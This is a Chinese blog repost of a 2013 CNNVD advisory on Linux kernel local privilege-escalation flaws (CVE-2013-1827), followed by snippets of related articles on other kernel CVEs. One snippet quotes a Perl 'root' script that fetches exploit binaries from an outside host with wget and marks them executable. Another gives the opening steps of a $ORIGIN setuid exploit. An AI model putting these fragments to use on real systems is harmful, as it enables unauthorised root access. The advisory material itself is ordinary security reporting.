Linux Kernel 多个本地权限提升漏洞

最新推荐文章于 2024-06-06 15:02:04 发布
最新推荐文章于 2024-06-06 15:02:04 发布
阅读量82 收藏
点赞数
原文链接:http://www.cnblogs.com/security4399/archive/2013/03/13/2958508.html
版权

漏洞名称:Linux Kernel 多个本地权限提升漏洞
CNNVD编号:CNNVD-201303-147
发布时间:2013-03-11
更新时间:2013-03-11
危害等级:  
漏洞类型:权限许可和访问控制
威胁类型:本地
CVE编号:CVE-2013-1827
漏洞来源:Mathias Krause

Linux Kernel是开放源码操作系统Linux所使用的内核。 
        Linux kernel中存在多个本地权限提升漏洞。本地攻击者利用这些漏洞以内核层权限执行任意代码。失败的攻击尝试将导致拒绝服务状态。

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: 
        http://www.kernel.org/

来源: BID 
名称: 58383 
链接:http://www.securityfocus.com/bid/58383

转载于:https://www.cnblogs.com/security4399/archive/2013/03/13/2958508.html

weixin_30550271
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux内核权限提升漏洞
javagty6778的博客
01-11 116
get_pipe_inode()函数又调用alloc_pipe_info()函数分配一个pipe_inode_info,该结构体是一个内核pipe结构体,用于管道的管理和操作。当再次向管道中写入数据时,因为pipe非初次使用,首先判断要写入的buffer类型,如果buf->flags为PIPE_BUF_FLAG_CAN_MERGE,行466,直接调用copy_page_from_iter()函数进行内存拷贝,而目的地址为buf->page,这个buf->page实际上就是来自file中对应的内存页面。
linux kernel map
09-24
7. **内存保护**:内核映射还包括权限设置,确保进程只能访问其自己的地址空间,防止数据泄露和安全漏洞。 8. **物理地址扩展(PAE)**:在32位系统中,通过扩展页表来访问更多物理内存。 通过深入理解这些概念,...
Linux Kernel nf_tables 本地权限提升漏洞(CVE-2024-1086)
最新发布
做自己喜欢的事,并将其发挥到极致!
06-06 7305
2024年1月,各Linux发行版官方发布漏洞公告,修复了一个 netfilter:nf_tables 模块中的释放后重用漏洞(CVE-2024-1086)。在nft_verdict_init()函数的错误处理导致nf_hook_slow()函数在NF_DROP的分支的时候以NF_ACCEPT返回,进而在NF_HOOK()函数产生释放后重用漏洞。鉴于该漏洞易于利用,并且允许本地攻击者提升至ROOT权限。​
漏洞预警】Linux kernel权限提升漏洞(CVE-2024-1086)
热门推荐
qq_18209847的博客
04-08 1万+
Linux内核版本v5.14 – v6.6的netfilter 子系统nf_tables组件中存在释放后使用漏洞,由于在nft_verdict_init()函数中,允许正值作为hook判决中的丢弃错误,因此当NF_DROP发出类似于NF_ACCEPT的丢弃错误时,nf_hook_slow()函数可能会导致双重释放漏洞,本地低权限威胁者可利用该漏洞权限提升为root。加强系统和网络的访问控制,修改防火墙策略,关闭非必要的应用端口或服务,减少将危险服务(如SSH、RDP等)暴露到公网,减少攻击面。
Linux Kernel 权限提升漏洞CVE-2023-32233
m0_48722220的博客
08-02 1439
Linux Netfilter 是一个在 Linux 内核中的网络数据包处理框架,也称作 iptables,它可以通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理,是 Linux 系统网络安全性和可靠性的重要组成部分。
权限提升Linux Kernel 权限提升漏洞 (CVE-2023-32233)
做自己喜欢的事,并将其发挥到极致!
05-23 1943
Linux Netfilter是一个在 Linux 内核中的网络数据包处理框架,它可以通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理,是 Linux 系统网络安全性和可靠性的重要组成部分。Linux内核的Netfilter子系统在处理批量请求更新nf_tables 配置信息时,由于处理匿名集的逻辑存在缺陷,存在释放重利用(UAF) 漏洞。利用该漏洞可对内核内存的任意读写,具有CAP_NET_ADMIN权限的本地用户可利用该漏洞提升至ROOT权限
【CVE-2023-1829】Linux Kernel权限提升漏洞(CVE-2023-1829)centos7解决方案
西原一点红的博客
06-28 2192
如果你需要进行内核模块的开发或构建,你可能需要安装 kernel-lt-headers 和 kernel-lt-devel 包。而如果你只是想安装最新的长期支持内核版本,你可以直接安装 kernel-lt 包。kernel-ml 中的ml是英文【 mainline stable 】的缩写,elrepo-kernel中罗列出来的是最新的稳定主线版本。kernel-lt 中的lt是英文【 long term support 】的缩写,elrepo-kernel中罗列出来的长期支持版本。B. 与当前版本差异小。
【已复现】Linux Kernel权限提升漏洞(CVE-2023-3269)安全风险通告
smellycat000的专栏
08-10 520
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Linux Kernel 权限提升漏洞漏洞编号QVD-2023-15242、CVE-2023-3269公开时间2023-07-05影响对象数量级万级奇安信评级高危CVSS 3.1分数7.8威胁类型权限提升利用可能性中POC状态已公开在野利用状态未发现EXP状态已公开技术细节状态已公开利用条件:需要本地低权限触发。(注:奇安信CERT的漏洞...
Linux kernel ip_setsockopt()整数溢出漏洞.pdf
09-07
这些漏洞可能允许本地攻击者破坏系统文件,导致拒绝服务攻击,甚至可能提升权限。受影响的系统包括IBM AIX 5.2和5.1.2。IBM同样提供了补丁以解决这些问题,用户可以通过ftp://aixsoftware.ibm....
Linux-kernel-architecture.zip_linux_linux kernel_linux-kernel_li
09-21
它支持多线程,允许多个任务同时执行,提高了系统的并发性和效率。 四、内存管理 Linux内核使用虚拟内存系统,使得每个进程都有独立的地址空间,增强了系统的安全性和稳定性。内核还实现了分页和分段机制,有效管理...
近期UNIX/Linux漏洞.pdf
09-06
这是由于Ignite-UX服务器实现上存在漏洞,攻击者可以通过利用该漏洞提升权限,获得对系统的控制权。 2. OpenBSD systrace溢出漏洞 OpenBSD的systrace组件中存在整数溢出漏洞,攻击者可以通过指定很大的整数值触发...
Unix/Linux近期公布漏洞.pdf
09-07
4. **Linux Kernel moxa串行驱动BSS溢出漏洞**:在Linux内核版本2.6.x、2.4.x和2.2.x中,MoxaDriverloc_t函数存在缓冲区溢出问题,本地攻击者可以利用此漏洞提升特权。通过精心构造的数据提交,攻击者可以控制长度值...
【安全狗高危安全通告】Linux Kernel权限提升漏洞解决方案
bocco的博客
09-22 641
安全狗应急响应中心监测到,Linux kernel 被披露出存在本地提权漏洞漏洞编号CVE-2022-2588。可导致攻击者权获得root权限等危害。
CVE-2024-1086 Linux kernel nf_tables 本地提权漏洞修复方法--多种方式,亲测!!!
qq_21160025的博客
06-03 9061
CVE-2024-1086 Linux kernel nf_tables 本地提权漏洞
【已复现】Linux Kernel 本地权限提升漏洞(CVE-2022-2602)安全风险通告
smellycat000的专栏
12-23 1933
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告近日,奇安信CERT监测到 Linux Kernel 本地权限提升漏洞Linux Kernel的io_uring 子系统中存在释放后重用漏洞,拥有低权限的本地攻击者可以利用该漏洞权限提升到ROOT权限。目前该漏洞PoC已公开在互联网上,鉴于该漏洞影响范围极大,建议客户尽快做好自查及防护。漏洞名称Linux Kern...
Linux2.6内核本地提权
weixin_34183910的博客
01-04 208
提权步骤: $mkdir/tmp/exploit #Linktoansuidbinary,thuschangingthedefinitionof$ORIGIN. $ln/bin/ping/tmp/exploit/target #Openafiledescriptortothetargetbinary(...
Linux Kernel 2.6 UDEV本地提权
末末很爱
01-17 252
1)创建用户:假设系统上已经建立了一个名为"ttalang",密码为"ttalang"的普通用户,并用该账户登录;(注意:ttalang的用户目录为/home/ttalang)  [ttalang@vmhost ~]$ pwd  /home/ttalang    2)复制代码:如下:完整复制该页面的代码,在本地ttalang目录下保存为名为"a"的文件;(注意:此时a的状态为/hom...
linux系统提权利器
weixin_33853794的博客
06-28 122
原理:下载一个运行一个,直到root为止。 用法:perl root.pl 内容: #!/usr/bin/perl #linux Kernel 2010-2011 get root { system(“wget marwal.ng.pl/tmp/install_4d8289a2d7a3d/1″); system(“chmod 777 1″);...
inux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel存在本地权限提升漏洞,该漏洞由于 Linux kernel中 copy_page_to_iter_pipe 和 push_pipe 函数的正确初始化存在缺陷,攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而将普通用户权限提升至 root权限
07-15
你对Linux kernel存在的本地权限提升漏洞有了很好的描述。这类漏洞确实可能导致攻击者利用不正确初始化的 copy_page_to_iter_pipe 和 push_pipe 函数来覆盖和重写任意可读文件中的数据,进而提升权限至 root 权限。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值